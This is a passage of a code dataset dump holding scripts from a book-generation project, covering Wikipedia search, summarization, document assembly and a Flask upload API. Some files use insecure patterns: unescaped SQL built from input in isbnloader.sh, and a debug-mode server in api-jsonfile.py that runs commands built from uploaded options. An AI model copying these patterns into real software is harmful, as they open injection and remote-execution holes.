Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\nmwclient_seeds_to_pages.py is responsible for providing \nexact page names to infile page names must be exact, i.e. are case \nand punctuation sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\nfrom collections import OrderedDict\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\nparser.add_argument(\"--cats_file\", help = \"path to outfile\", default = 'cats')\nparser.add_argument(\"--extlinks_file\", help = \"path to save extlinks file\", default = 'extlinks')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nprint('output_file is ')\nprint(output_file)\ncats_file = args.cats_file\nextlinks_file = args.extlinks_file\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\n\n\ndef recursive_items(dictionary):\n for key, value in dictionary.items():\n if type(value) is OrderedDict:\n #print('match')\n yield from recursive_items(value)\n else:\n #print('no match')\n yield (key, value)\n\nwikipath = args.wikipath\nsite = mwclient.Site('en.wikipedia.org', scheme=\"https\")\nprint(site)\nfile1 = open(input_file, 'r').read().splitlines()\n\nfor line in file1:\n try:\n #print('seed is ' + line)\n page = site.pages[line]\n d = site.api('query', generator='search', gsrsearch=line)\n #print(d)\n for key, value in recursive_items(d):\n if 'title' in key:\n print(value, file=open(output_file, 'a'))\n #pagetitle_list = page.pagetitle()\n #print(*pagetitle_list, sep='\\n', file=open(output_file, \"w\"))\n except:\n mwclient.errors.InvalidPageTitle\n continue\n\n\n" }, { "alpha_fraction": 0.5539647340774536, "alphanum_fraction": 0.5627753138542175, "avg_line_length": 22.30769157409668, "blob_id": "dc81d7a5fef586c7e76c53669a87f4dcd45ba30f", "content_id": "bedc5ced7cfdef15fc8b24b150246d6e01add8d9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 908, "license_type": "permissive", "max_line_length": 80, "num_lines": 39, "path": "/scripts/bin/PKsummarizer.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#PKsummarizer.py\n#Inputs:\n#1)input text file \n#2)uuid\n#3)summary type (for now we'll just use # of lines as a proxy, in future, could \n# be something like: short, long, proportional\n#Outputs:\n#1) summary of input text\n#Attributes to add:\n#1) use seed as input for query based summarization\n# \n#######\n\nimport sys, os \nimport summarize\n\n\n#=================================================\ndef main():\n\tinput_text = str(sys.argv[1])\n\tuuid_path = str(sys.argv[2])\n\tsum_lines = sys.argv[3]\n\tos.chdir(uuid_path)\n\t\n\tss = summarize.SimpleSummarizer()\n\twith open(input_text) as tosumfile:\n\t\tinput = tosumfile.read()\n\t\n\tsummaried = ss.summarize(input, sum_lines)\n\t\n\twith open('sum_text.txt', \"w+\") as towritefile:\n\t\ttowritefile.write(summaried)\n\n \n#=================================================\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6752136945724487, "alphanum_fraction": 0.6752136945724487, "avg_line_length": 57.5, "blob_id": "67f62eafa21ec548b8137283f13decc80a9a86f7", "content_id": "a1badb92eda65d8af293b980d8eb49bf46d5683f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 117, "license_type": "permissive", "max_line_length": 104, "num_lines": 2, "path": "/scripts/git_show_tags.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\ngit for-each-ref --format=\"%(refname:short) %(taggerdate) %(subject) %(body)\" refs/tags --sort v:refname\n" }, { "alpha_fraction": 0.6813380122184753, "alphanum_fraction": 0.6923415660858154, "avg_line_length": 19.816513061523438, "blob_id": "17d0ba773504480949d3d00ae2eb8f2b2c6ed3ab", "content_id": "b4a660ab475b0e26dc656b74ec8dc9cf07506e10", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2272, "license_type": "permissive", "max_line_length": 120, "num_lines": 109, "path": "/scripts/includes/document-assembler_chicago_style.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nunformattedwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt | sed -e :a -e 's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' `\ncp tmp/$uuid/tmp.cumulative.txt tmp/$uuid/test.cumulative.txt\n\necho \"wordcount is\" $wordcount | tee --append $sfb_log\necho \"unformatted wordcount is\" $unformattedwordcount | tee --append $sfb_log\n\n# the html home page header and footer are already stored in includes/temptoc_*\n\ncat includes/temptoc-header.html > tmp/$uuid/2.cumulative.html\n\n# title page\n\n# copyright page\n\n# Dedication\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename >> tmp/$uuid/2.cumulative.html\n\n# Epigraph\n\n# List of Illustrations\n\n# List of Tables\n\n# Foreword\n\n# Preface\n\n\n# Author's signature (optional)\n\n\n# Acknowledgments\n\n\n\n# Introduction\n\n\n# List of abbreviations\n\n\n# Publisher's or translator's notes\n\n\n\n# Body\n\n# Parts\n\necho \"$h1\"Part I: User-Provided Content\"$h1end\" >> tmp/$uuid/2.cumulative.html\n\necho \"userdata directory is\" $userdatadir\n\nif [ \"$userdatadir\" = \"none\" ] ; then\n\n\techo \"no user files provided\" >> tmp/$uuid/temptoc.html\n\nelse\n\t# echo flat directories only for now -- in future, support directory userdata via find command\n\n\t# process docs in user-submitted folder \n\n\tfor file in tmp/$uuid/user/*\n do \n echo $h2$openanchor\"tmp/\"$uuid/user/$file$dq$endbr\"Chapter\"$angbr$endanchor$h2end >> tmp/$uuid/2.cumulative.html\n cat $file >> tmp/$uuid/2.cumulative.html\n\tdone\nfi\n\n# Chapters\n\necho \"$h1\"Part II: Permitted Content from the Web\"$h1end\" >> tmp/$uuid/temptoc.html\n\n for file in tmp/$uuid/wiki/*.html\n do \n echo $h2$openanchor\"tmp/\"$uuid/wiki/$file$dq$endbr\"Chapter\"$angbr$endanchor$h2end >> tmp/$uuid/2.cumulative.html\n cat $file >> tmp/$uuid/2.cumulative.html\n\tdone\n\necho \"$h1\"Part III: Permitted Images\"$h1end\" >> tmp/$uuid/temptoc.html\n\n\tfor file in tmp/$uuid/flickr/*.jpg\n do \n echo $imgsrc$dq$file$dq$endbr >> tmp/$uuid/2.cumulative.html\n done\n\n# Epilogues, Afterwords, and Conclusions\n\n# Appendixes\n\n# Chronology\n\n# Endnotes\n\n# Glossary\n\n# Bibliography\n\n# Contributors\n\n# Index\n\n# Colophon\n\ncat includes/temptoc-footer.html >> tmp/$uuid/temptoc.html\n\necho \"built temporary Table of Contents page\" | tee --append $sfb_log\n\n\n" }, { "alpha_fraction": 0.7451274394989014, "alphanum_fraction": 0.7451274394989014, "avg_line_length": 34.05263137817383, "blob_id": "cff99f789d81f8f3e991a79747a10153dddb41d7", "content_id": "e71c5b85ff177486fc9768148a7d6ac39bb3aa43", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1334, "license_type": "permissive", "max_line_length": 72, "num_lines": 38, "path": "/scripts/includes/echo-variables.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"reporting values of variables after setup\" | tee --append $sfb_log\necho \"rows is\" $rows \necho \"price is\" $price \necho \"categoryid is\" $categoryid \necho \"seedfile is\" $seedfile \necho \"userid is\" $userid \necho \"customtitle is\" $customtitle \necho \"endurl is\" $endurl \necho \"coverfile is\" $coverfile \necho \"fetchfile is\" $fetchfile \necho \"special_lasts_minutes is\" $special_lasts_minutes \necho \"special_price is\" $special_price \necho \"covercolor is\" $covercolor \necho \"coverfont is\" $coverfont \necho \"covertype_id is\" $covertype_id \necho \"coverbase is\" $coverbase \necho \"coverfontcolor is\" $coverfontcolor \necho \"coverRGB is\" $coverRGB \necho \"text_extraction_on is\" $text_extraction_on \necho \"refresh is\" $refresh \necho \"editedby is\" $editedby \necho \"seedsource is\" $seedsource \necho \"breaking is\" $breaking \necho \"editorid is\" $editorid \necho \"singleseed is\" $singleseed \necho \"import is\" $import \necho \"mylibrary is\" $mylibrary \necho \"fleet is\" $fleet \necho \"booktype is\" $booktype \necho \"ebookformat is\" $ebookformat \necho \"fetched_document_format is\" $fetched_document_format \necho \"verbose is\" $verbose \necho \"userdescription is\" $userdescription \necho \"pass_uuid is\" $pass_uuid \necho \"ISBN_assign_automatically\" is $ISBN_assign_automatically \necho \"ISBN is\" $ISBN \n# echo \"ISBN_owner is\" ) \necho \"jobprofile is\" $jobprofile \n\n" }, { "alpha_fraction": 0.7069970965385437, "alphanum_fraction": 0.7099125385284424, "avg_line_length": 31.571428298950195, "blob_id": "d8857ca901fa1e4248853f5d819a6dbfcda02ec7", "content_id": "86b1bc2564b5d6c044442b0f975a5c0cc6d5ce2b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 686, "license_type": "permissive", "max_line_length": 193, "num_lines": 21, "path": "/scripts/includes/process-nodes-from-searchresults-4-booktype-explorer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# xmlstarlet queries the searchresults.xml file and extracts all the title attributes \n\n# the title attributes are the only information brought back by the retrieve_all_links query, there are no abstracts or urls\n\nxmlstarlet sel -t -m \"/api/query/pages/page/links/pl\" -v \"@title\" -n fetch/$uuid/searchresults.xml | grep -Ev 'Wikipedia|Template|Category|Portal|Help' | sed '/^$/d' > fetch/$uuid\"/titles.txt\"\n\ndoccount=`wc -l < fetch/$uuid\"/titles.txt\"`\n\nif [ \"$doccount\" = 0 ] ; then\n\n\techo \"skipping no relevant documents for seed\" $seed | tee --append $sfb_log\n\n\t# exit 0\n\n\tpass\n\nelse\n\n\techo \"will be fetching \" $doccount \"documents on this seed \" $seed | tee --append $sfb_log\n\nfi\n\n\n" }, { "alpha_fraction": 0.7099236845970154, "alphanum_fraction": 0.7099236845970154, "avg_line_length": 22.81818199157715, "blob_id": "61d49394695bc9755ca4f63c78037b4758789273", "content_id": "7d15c4807e5165bc2b161aa0c295845367151fc5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 262, "license_type": "permissive", "max_line_length": 91, "num_lines": 11, "path": "/scripts/isbnloader.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../../conf/config.txt\n\nwhile read isbn\ndo\n$LOCAL_MYSQL_PATH --user $LOCAL_MYSQL_USER --password=$LOCAL_MYSQL_PASSWORD sfb-jobs << EOF\ninsert into isbns (ISBN) values('$isbn');\nEOF\necho \"inserted ISBN\" $isbn \"into isbns table\"\ndone<add_these_isbns\n" }, { "alpha_fraction": 0.5632911324501038, "alphanum_fraction": 0.5632911324501038, "avg_line_length": 35.46154022216797, "blob_id": "e6b78cd6330ffd321369d8db10fb32e903c04c86", "content_id": "880f675da2387b5255dc99480b78809bbecbf003", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 474, "license_type": "permissive", "max_line_length": 66, "num_lines": 13, "path": "/scripts/includes/tldr.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ -z \"$tldr\" ]; then\n echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n echo \"# Programmatic TL;DR:\" >> \"$TMPDIR\"$uuid/tldr.md\n #cat $TMPDIR$uuid/shortest_summary.md >> \"$TMPDIR\"$uuid/tldr.md\nelse\n echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n echo \" \" >> \"$TMPDIR\"$uuid/tldr.md\n echo \"# TL;DR:\" >> \"$TMPDIR\"$uuid/tldr.md\n echo \"$tldr\" >> \"$TMPDIR\"$uuid/tldr.md\nfi\necho \" \" >> \"$TMPDIR\"$uuid/tldr.md\necho \" \" >> \"$TMPDIR\"$uuid/tldr.md\n" }, { "alpha_fraction": 0.7909482717514038, "alphanum_fraction": 0.7909482717514038, "avg_line_length": 153.6666717529297, "blob_id": "456c91f0a4fcb0ecad4f18fca506ddba10013bff", "content_id": "5faac35461e42e05a200fd394c2ee5c73ada1fa2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 271, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Robbie_29.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Robbie is an avid collector of folk lore and stories. he has been involved in thr preservation of oral histories since his graduate school days at St. Andrew's University. As a member of the PageKicker team, Robbie has been working on myths, lyrical poetry and folk lore.\n\nDespite rumors to the contrary, Robbie doesn't cook haggis or shortbread. In fact he doesn't cook at all, its just another tall tale Robbie says his Mother spread to find him a \"wee lassie.\"\n" }, { "alpha_fraction": 0.6621915698051453, "alphanum_fraction": 0.6752539873123169, "avg_line_length": 20.873016357421875, "blob_id": "65fbd223b16a2f092f8c02b94ca498d99266fdeb", "content_id": "e10017177700e9040ab7098b5311ef3ec32bb534", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2756, "license_type": "permissive", "max_line_length": 164, "num_lines": 126, "path": "/scripts/bin/wordcloudwrapper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# runs wordcloud program with text file input\n\n# requires java, IBMcloud\n\n# input: text file\n# optional: wordcloud_height, wordcloud_width, configfile, outfile\n# output: wordcloud.png\n\n# edit path to PageKicker config file here\n\n. /home/$USER/.pagekicker/config.txt\n\n\n# configuration values for this program\n\nconfigfile=\"$scriptpath\"lib/IBMcloud/examples/configuration.txt\nwordcloud_height=5100\nwordcloud_width=6600\noutfile=\"wordcloud\" # if multiple wordclouds are run this is the basename\nstopfile=\"$scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"usage:\"\necho \"bin/wordcloudwrapper.sh --txtinfile /path/to/file\"\necho \"-c /path/to/config/file\" -h \"pixel height\" -w \"pixel width\" -o \"/path/to/outfile\"\necho \"outfile should *not* have filetype extension (it is png by default)\"\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n-f|--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n-f|--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n-w|--wordcloud_width)\nwordcloud_width=$2\nshift 2\n;;\n-w|--wordcloud_width=*)\nwordcloud_width=${1#*=}\nshift\n;;\n-h|--wordcloud_height)\nwordcloud_height=$2\nshift 2\n;;\n-h|--wordcloud_height=*)\nwordcloud_height=${1#*=}\nshift\n;;\n-c|--configfile)\nconfigfile=$2\nshift 2\n;;\n-c|--configfile=*)\nconfigfile=${1#*=}\nshift\n;;\n--outfile|o)\noutfile=$2\nshift 2\n;;\n--outfile|o=*)\noutfile=${1#*=}\nshift\n;;\n-T|--stopfile)\nstopwordfile=$2\nshift 2\n;;\n-T|--stopfile=*)\nstopwordfile=${1#*=}\nshift 2\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\n#echo \"JAVA_BIN is\" $JAVA_BIN\n#echo \"jar file is\" $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\"\n#echo \"configfile is\" $configfile\n\n# rotate stopwordfile in and out\n\n#echo \"current stopfile is\" $stopfile\ncurrent=$(ls $stopfile)\npk=$(ls $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\")\nif [ \"$current\" = \"$pk\" ] ; then\n true\nelse\n cp \"$stopfile\" $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n#echo \"running stopfile $stopfile\"\n\n$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $configfile -h \"$wordcloud_height\" -w \"$wordcloud_width\" < \"$txtinfile\" > $outfile\".png\" 2> /dev/null\n\ncp $scriptpath\"lib/IBMcloud/examples/restore-pk-stopwords.txt\" $scriptpath\"lib/IBMcloud/examples/pk-stopwords.txt\"\n\necho \"wordcloud from $txtinfile is at $outfile.png\"\n\nexit 0\n" }, { "alpha_fraction": 0.43518519401550293, "alphanum_fraction": 0.5709876418113708, "avg_line_length": 11.423076629638672, "blob_id": "6d57b56394f40f884be27119a5a453bfac5a98e7", "content_id": "af4a8ecdab1bde26fa1b8b99c8a4cc267725666c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 324, "license_type": "permissive", "max_line_length": 44, "num_lines": 26, "path": "/scripts/includes/pricing.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\nif [[ \"$wordcount\" -lt \"1000\" ]] ; then\n\n\tprice=0.99\n\nelif [[ \"$wordcount\" -lt \"10000\" ]] ; then\n\n\tprice=1.99\n\nelif [[ \"$wordcount\" -lt \"80000\" ]] ; then\n\n\tprice=2.99\n\nelif [[ \"$wordcount\" -lt \"120000\" ]] ; then\n\n\tprice=3.99\n\nelif [ \"$wordcount\" -lt \"250000\" ] ; then\n\n\tprice=4.99\nelse\n\n\tprice=4.99\n\nfi\n\n" }, { "alpha_fraction": 0.6013179421424866, "alphanum_fraction": 0.6153212785720825, "avg_line_length": 16.328571319580078, "blob_id": "beef98abef2291ffc49ba3acd1bc8fab7f69b12b", "content_id": "76cc173d4b1b731aade15b2a5479a0c8e6f1e849", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1214, "license_type": "permissive", "max_line_length": 81, "num_lines": 70, "path": "/scripts/splitter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# splits text files into chunks of arbitrary length\n\n# input: text file txtinfile\n# optional: size of chunks\n# output: chunked files\n\n# edit path to PageKicker config file here\n\n. /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n\n\n# configuraiton values for this program\n\nchunksize=\"140K\" #default\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--chunksize)\nchunksize=$2\nshift 2\n;;\n--chunksize=*)\nchunksize=${1#*=}\nshift\n;;\n\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\n\necho \"chunksize is\" $chunksize\n\nfor file in *.txt\ndo\n split -b $chunksize $file \"$file.\"\n echo \"split \" $file\ndone\n\n" }, { "alpha_fraction": 0.6978922486305237, "alphanum_fraction": 0.6978922486305237, "avg_line_length": 41.70000076293945, "blob_id": "55a4e739ec8f690511cd15ead522be4536a25fd9", "content_id": "1dd3bc3e03afb733fd7edd7fc3ddd35c3b6627ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 427, "license_type": "permissive", "max_line_length": 113, "num_lines": 10, "path": "/scripts/includes/add_user_content.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "if [ \"$add_this_content\" = \"none\" ] ; then\n\techo \"no added content\"\n\ttouch $TMPDIR$uuid/add_this_content.\nelse\n\techo \"adding user content to front matter\"\n\tcp \"$add_this_content\" \"$TMPDIR\"$uuid\"/add_this_content_raw\"\n\techo \"$add_this_content\"\n\t\"$PANDOC_BIN\" -f docx -s -t markdown -o \"$TMPDIR\"$uuid\"/add_this_content.md \"$TMPDIR\"$uuid/add_this_content_raw\"\n\tcat $TMPDIR$uuid\"/add_this_content.md\" >> $TMPDIR$uuid/tmpbody.md\nfi\n" }, { "alpha_fraction": 0.5590627789497375, "alphanum_fraction": 0.565571129322052, "avg_line_length": 29.425743103027344, "blob_id": "9db93d55ee750e94ce8c0ac7cde62f023324dfa4", "content_id": "1503b24daee707d43a4145db5742d4f3bffa8dca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3073, "license_type": "permissive", "max_line_length": 86, "num_lines": 101, "path": "/api/api-jsonfile.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 18:44:35 2016\n\n@author: fred\n\"\"\"\nimport subprocess\nimport os\nimport psutil\nimport json\nimport shlex\nimport configparser\n\nfrom flask import Flask, request, send_from_directory\nfrom werkzeug.utils import secure_filename\n\nimport logging\nfrom logging import FileHandler\n\n\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\ncommandpath = config.get(\"Paths\", \"commandpath\")\nmycwd = config.get(\"Paths\", \"mycwd\")\n\n\n# Configure the app\napp = Flask(__name__)\n\nfile_handler = FileHandler(\"/tmp/pagekicker/debug.log\",\"a\")\nfile_handler.setLevel(logging.WARNING)\napp.logger.addHandler(file_handler)\n\nUPLOAD_FOLDER = '/tmp/pagekicker/'\nALLOWED_EXTENSIONS = set(['json'])\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\[email protected]('/api-json', methods=['GET', 'POST'])\n\ndef upload_file():\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n print('No file part')\n return\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n print('No selected file')\n return\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n filename = str((os.path.join(app.config['UPLOAD_FOLDER'], filename)))\n with open(filename) as json_data:\n d = json.load(json_data)\n s = ' '.join( '{} \"{}\"'.format(k, v) for k,v in d['options'].items() )\n\n cli = commandpath + ' ' + s\n print('command line will be' + ' ' + cli)\n args = shlex.split(cli)\n print(args)\n status = subprocess.check_output(args, cwd = mycwd)\n return send_from_directory('/tmp/pagekicker/', '4stdout.txt')\n\n# Initialize and run the server\nif __name__ == '__main__':\n\n import click\n\n @click.command()\n @click.option(\"-d\", \"--daemon\", default=False, is_flag=True,\n help=\"Run in daemon mode.\")\n\n def run(daemon):\n if daemon:\n pid_file = './api-json.pid'\n if os.path.isfile(pid_file):\n pid = int(open(pid_file).read())\n os.remove(pid_file)\n try:\n p = psutil.Process(pid)\n p.terminate()\n except:\n pass\n try:\n p = subprocess.Popen(['python3', 'api-json.py'])\n open(pid_file, 'w').write(str(p.pid))\n except subprocess.CalledProcessError:\n raise ValueError(\"error starting api-json.py daemon\")\n else:\n print(\"api-json running...\")\n app.run(host='::', port=5036, debug=True)\n run()\n" }, { "alpha_fraction": 0.8167259693145752, "alphanum_fraction": 0.8274021148681641, "avg_line_length": 186.3333282470703, "blob_id": "d7f523e00f0939152d8a3c8273f3c02cec33c6c2", "content_id": "22775294464ffb6d75f9992c68da3b5a053958e2", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 562, "license_type": "permissive", "max_line_length": 421, "num_lines": 3, "path": "/conf/jobprofiles/authorbios/Jose_Cabot-Goldstein-Brown.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Jose is a 10 generation American family with WASP, Jewish- Afro-American and Hispanic grandparents. As a part of the American melting pot of cultures he has been long interested in hyphens and hyphenated families. Jose is currently editing the PageKicker series on hyphenated Americans with great pride and attention to detail. Please read all of his inspiring pamphlets on historically significant hyphenated Americans.\n\nJose recently attended his 1776th patriotic parade, which he felt wa fitting considering the association with the founding of the US of A.\n" }, { "alpha_fraction": 0.6206650137901306, "alphanum_fraction": 0.6271004676818848, "avg_line_length": 28.44210433959961, "blob_id": "09495bbc1257acfc27a77d7aba0265faea6d5ec2", "content_id": "71472412685b94700f7c76da63dff5b38fe8eb0f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2797, "license_type": "permissive", "max_line_length": 80, "num_lines": 95, "path": "/scripts/bin/nerv3.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Jeffrey Herbstman\n# nerv3.py\n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file\n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name\n# Outputs:\n# Output file written\n#\n###################################################\n\n#gonna need to install AlchemyAPI\nimport AlchemyAPI\nimport argparse\nimport xml.etree.ElementTree as ET\nimport collections\nimport codecs\nimport os\n#from IPython import embed\n#=================================================\ndef listwrite(output_file,thelist):\n\tfor item in thelist:\n\t\titem.encode('utf-8')\n\t\toutput_file.write(\"%s\\n\" % item)\n\n#=================================================\n\ndef main():\n\n\ttmpdir = \"/tmp/pagekicker\"\n\n\t#personal api key saved as api_key.txt\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('path', help = \"target file or directory for NER\")\n\tparser.add_argument('output', help = \"target file for output\")\n\tparser.add_argument('uuid', help = \"uuid\")\n\targs = parser.parse_args()\n\n\tin_file = args.path\n\tout_file = args.output\n\tuuid = args.uuid\n\tfolder = os.path.join(tmpdir, uuid)\n\t# print folder\t\n\tcwd = os.getcwd()\n\tapikey_location = os.path.join(cwd, \"api_key.txt\")\n\n\twith open(in_file) as f:\n\t\ttext = f.read()\n\n\talchemyObj = AlchemyAPI.AlchemyAPI()\n\talchemyObj.loadAPIKey(apikey_location)\n\n\tresult = alchemyObj.TextGetRankedNamedEntities(text)\n\n\troot = ET.fromstring(result)\n\n\tplace_list = ['City', 'Continent', 'Country', 'Facility', 'GeographicFeature',\\\n\t'Region', 'StateOrCounty']\n\tPeople = {}\n\tPlaces = {}\n\tOther = {}\n\n\tfor entity in root.getiterator('entity'):\n\t\tif entity[0].text == 'Person':\n\t\t\tPeople[entity[3].text]=[entity[1].text, entity[2].text]\n\t\telif entity[0].text in place_list:\n\t\t\tPlaces[entity[3].text] = [entity[1].text, entity[2].text]\n\t\telse:\n\t\t\tOther[entity[3].text] = [entity[1].text, entity[2].text]\n\n\t#print lists ordered by relevance\n\tPlaces_s = sorted(Places, key = Places.get, reverse = True)\n\tPeople_s = sorted(People, key = People.get, reverse = True)\n\tOther_s = sorted(Other, key = Other.get, reverse = True)\n\n\twith codecs.open(out_file, mode = 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\t\tlistwrite(o, Places_s)\n\t\tlistwrite(o, Other_s)\n\tout_file = os.path.join(folder, 'People')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, People_s)\n\tout_file = os.path.join(folder, 'Places')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Places_s)\n\tout_file = os.path.join(folder, 'Other')\n\twith codecs.open(out_file, mode= 'w', encoding='utf-8') as o:\n\t\tlistwrite(o, Other_s)\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7789541482925415, "alphanum_fraction": 0.781520664691925, "avg_line_length": 66.76087188720703, "blob_id": "506bb73e2e7c80b984020284b27ebc50c9af92f3", "content_id": "6078fcbc34a6862ab8f72dfd1d6fd8a9eef1aca6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3119, "license_type": "permissive", "max_line_length": 417, "num_lines": 46, "path": "/scripts/enrollbuildandshare.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# enroll, build, and share (ebs.sh)\nEnroll creates a single gra.ph ID, however, it should also have an embedded logic, like a prefix for a business, and a geo location ID and a language and topic coding. The builds should all flow for fastest processing. The sharing should have a priority. Social first, adjacent topics second, and serendipitous 